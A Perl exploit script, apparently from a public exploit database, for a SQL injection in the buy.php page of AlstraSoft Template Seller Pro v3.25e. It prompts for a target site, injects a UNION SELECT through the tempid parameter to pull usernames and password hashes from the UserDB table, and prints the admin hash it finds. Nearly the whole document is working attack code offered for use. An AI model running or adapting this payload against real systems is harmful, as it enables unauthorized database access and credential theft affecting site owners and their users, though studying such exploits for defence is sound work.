#!/usr/bin/perl -w # # # # # # Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability # Google Dork: N/A # Date: 04.02.2017 # Vendor Homepage: http://www.alstrasoft.com/ # Software Buy: http://www.alstrasoft.com/template.htm # Demo: http://blizsoft.com/templates/ # Version: 3.25e # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } clear(); print "|----------------------------------------------------|\n"; print "| Template Seller Pro v3.25e Remote SQL Injector |\n"; print "| Author: Ihsan Sencan |\n"; print "| Author Web: http://ihsan.net |\n"; print "| Mail : ihsan[beygir]ihsan[nokta]net |\n"; print "| |\n"; print "| |\n"; print "|----------------------------------------------------|\n"; use LWP::UserAgent; print "\nInsert Target:[http://wwww.site.com/path/]: "; chomp(my $target=); print "\n[!] Exploiting Progress...\n"; print "\n"; $elicha="group_concat(user_name,char(58),user_password)"; $table="UserDB"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n"; print "[+] Success !!\n"; print "\n"; } else{print "\n[-]Not found.\n"; } # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-07]